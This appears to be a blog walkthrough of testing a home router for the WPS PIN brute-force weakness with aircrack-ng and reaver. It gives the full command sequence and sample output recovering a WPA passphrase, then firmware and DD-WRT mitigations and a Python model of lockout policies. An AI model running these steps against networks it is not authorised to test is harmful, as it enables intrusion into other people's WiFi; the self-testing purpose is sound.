In order to do this, you must have a WiFi card that can enter monitor mode. The Panda PAU05 300Mbps worked well for me, but I cannot guarantee that the card will work for you. Some cards of the same model ship with different chipsets, or have new versions released. Buy an appropriate card at your own risk!
Without a working card, you will be unable to carry out this test.
Install the necessary tools.
```
sudo apt-get install \
    aircrack-ng \
    reaver
```
Disable your WiFi interface.
```
sudo ifconfig wlan0 down
```
Enable monitor mode for your WiFi interface.
```
sudo airmon-ng start wlan0
```
Note the name of the monitoring interface printed by the command above; it is used in all of the commands that follow. In my case, it is `wlan0mon`.
Kill processes that may conflict with airmon tools.
```
sudo airmon-ng check kill
```
Scan for a network.
```
sudo airodump-ng wlan0mon
```
PWR indicates signal strength. A number like `-20` is superior to a number like `-74`: the greater number is superior, and `-20` is greater than `-74`.
Try to test for the WPS vulnerability against the AP using `reaver`, which is specifically designed for this exploit. Specify your device's channel with `-c` and the BSSID (the MAC address of the router) with `-b`.
```
sudo reaver \
    -i wlan0mon \
    -c 2 \
    -b 22:46:BA:34:CB:18 \
    -vv \
    -L \
    -N \
    -d 30 \
    -T 1 \
    -r 3:15
```
If your access point is vulnerable, the WPS pin will eventually be discovered.
```
[+] Pin cracked in 273832 seconds
[+] WPS PIN: '29701453'
[+] WPA PSK: 'thepassword123'
[+] AP SSID: 'MyAccessPoint'
```
My router was compromised in 273832 seconds, which is just over 3 days.
My Netgear WNR2000v3 was then updated to the latest firmware as listed here.
```
Current Firmware Version: V188.8.131.52
New Firmware Version: V184.108.40.206
Current GUI Language Version: V220.127.116.11
New GUI Language Version: V18.104.22.168
```
This upgrade automatically enables a 3 second lockout for failed WPS attempts.
`reaver` did not seem to care, and went to work hacking the PIN just as it did before. It was not affected by that lockout setting.
In cases like that, it seems the only reliable preventative measure is to either get a router that actually disables WPS, or install DD-WRT on your router.
Fortunately, this firmware upgrade actually worked in my case, and `reaver` was unable to determine my PIN.
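The 3 second lockout above only bites when attempts arrive closer together than that, so a brute force that paces itself slower than the lockout is never throttled by it. The following is an added Python model of two lockout policies, written for this post rather than taken from it or from any router firmware; the policy parameters, the event format and the `FailureCountLockout` policy are assumptions used for illustration.

```python
"""Model of WPS failed-attempt lockout policies (added example, not from the post)."""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class FixedDelayLockout:
    """Mirror of the firmware setting above: drop any attempt that arrives
    within `lockout_s` seconds of the previous failed attempt."""
    lockout_s: float
    _last_failure: Optional[float] = None

    def attempt(self, t: float, success: bool) -> bool:
        """Return True if the attempt at time t (seconds) is processed."""
        if self._last_failure is not None and t - self._last_failure < self.lockout_s:
            return False  # still inside the lockout window, attempt dropped
        if not success:
            self._last_failure = t
        return True


@dataclass
class FailureCountLockout:
    """Assumed stronger policy: after `max_failures` failures within any
    `window_s` span, disable WPS entirely for `hold_s` seconds."""
    max_failures: int
    window_s: float
    hold_s: float
    _failures: List[float] = field(default_factory=list)
    _locked_until: float = -1.0

    def attempt(self, t: float, success: bool) -> bool:
        if t < self._locked_until:
            return False  # WPS disabled, attempt dropped
        if not success:
            recent = [f for f in self._failures if t - f <= self.window_s]
            self._failures = recent + [t]
            if len(self._failures) >= self.max_failures:
                self._locked_until = t + self.hold_s
                self._failures.clear()
        return True


def processed_attempts(policy, spacing_s: float, n: int) -> int:
    """Count how many of n failed attempts, spaced spacing_s seconds apart
    (constructed event stream), the policy actually processes."""
    return sum(policy.attempt(i * spacing_s, False) for i in range(n))
```

With attempts 30 seconds apart, the fixed 3 second delay processes every one of them, while the failure-count policy processes only a few per lockout period.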